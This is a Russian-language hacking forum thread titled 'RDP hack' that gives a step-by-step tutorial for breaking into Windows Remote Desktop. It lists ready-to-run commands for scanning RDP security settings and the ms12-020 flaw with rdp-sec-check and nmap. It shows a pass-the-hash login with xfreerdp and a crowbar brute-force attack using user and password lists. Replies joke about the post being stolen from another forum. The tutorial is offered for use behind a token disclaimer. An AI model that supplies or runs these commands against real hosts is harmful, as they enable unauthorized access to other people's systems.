Загрузка...

RDP hack

Thread in Kali Linux created by ЛДПР Jun 4, 2022. 1523 views

  1. ЛДПР
    ЛДПР Topic starter Jun 4, 2022 Banned 5059 Aug 23, 2019
    RDP (Remoute Desktop Protocol) - протокол для управления удалённым рабочим столом, по умолчанию использующий TCP 3389 порт.

    Официальное название для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC)


    ДИСКЛЕЙМЕР:

    Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!

    Сбор информации:
    Инструмент rdp-sec-check проверяет, какие используются алгоритмы шифрования и методы аутентификации, а также некоторые другие настройки безопасности. В конце проверки rdp-sec-check подводит краткий итог о возможных проблемах безопасности службы удалённого рабочего стола.

    Установка в Kali Linux:

    Code
    sudo cpan
    install Encoding::BER
    Ctrl+d
    wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl
    chmod +x rdp-sec-check.pl
    ./rdp-sec-check.pl --help
    Пример использования:

    rdp-sec-check IP
    https://sun9-9.userapi.com/impg/felLlI3iKmSLk***yxtEb9esgPe6nrA20z3pfg/7l3uCoMXPfo.jpg?size=658x360&quality=96&sign=d0bbdb73236e0f3e4b53d899b34456fd&type=album

    Если после строки "[+] Summary of security issues" (краткий перечень проблем безопасности) ничего нет, значит явных проблем не выявлено.

    Также можно собрать информацию с помощью скриптов nmap:

    rdp-enum-encryption - определяет уровень безопасности и шифрования.

    rdp-ntlm-info - перечисляет инфу от удалённых служб RDP с включённой аутентификацией CredSSP (NLA).

    rdp-vuln-ms12-020 - проверяет систему на уязвимость ms12-020


    Для запуска всех скриптов сразу:

    sudo nmap -p 3389 -sU -sS --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 IP
    [IMG]

    Pass-The-Hash:
    В kali linux по умолчанию установлен опенсорсный RDP-клиент "xfreerdp", который способен подключаться к системе по хэшу. Этот хэш хранится на системе, к которой нужно подключиться в формате NT.

    Команда для атаки:

    xfreerdp /d:domain_name /u:Administrator/pth:8846F7EAEE8FB117AD06BDD830B7586C /v:IP
    где после /d: — имя домена,

    после /u: — имя пользователя,

    после /pth: —хеш,

    после /v: — IP сервера.


    Но есть тонкость этого метода. Такой способ будет работать только для администратора, то есть подключится к юзерам из группы RDP Users нельзя.

    *****Force:
    Для атаки ****форсом рассмотрим crowbar.

    Для начала установим crowbar:

    sudo apt install crowbar
    И подтверждаем установку, нажав клавишу Y, когда это потребуется.

    В качестве цели можно указать даже целый диапазон IP-адресов с помощью опции -S file.txt, где "file.txt" - файл с IP-адресами. Опцией -s можно указать диапазон IP-адресов в формате CIDR. Если нужно указать одну цель, используется -s ip/32, где "32" - это маска.

    Команда для атаки:

    sudo crowbar -b rdp -U user.txt -C passwords.txt -s IP/32
    -b rdp -протокол

    -U user.txt - файл с юзерами

    -C - файл с паролями

    -s - Цель


    [IMG]

    Подключение:

    xfreerdp /f /u:пользователь /p:пароль /v:IP[:порт]
    Соглашаемся с сертификатом (yes)

    Для переключения полноэкранного режима на оконный:

    CTRL+ALT+ENTER
     
  2. RSPARKER
    RSPARKER Jun 4, 2022 2228 Feb 19, 2018
    укажи то что у овера спиздил
     
    1. ЛДПР Topic starter
      RSPARKER, Не спиздил а поделился) Пиздят бабки а я делюсь)))
  3. EXoTuK
    EXoTuK Jun 4, 2022 Забан3н 68 May 26, 2022
    Полезно, недавно делал тему про получение RDP, но её снесли.
     
Loading...
Top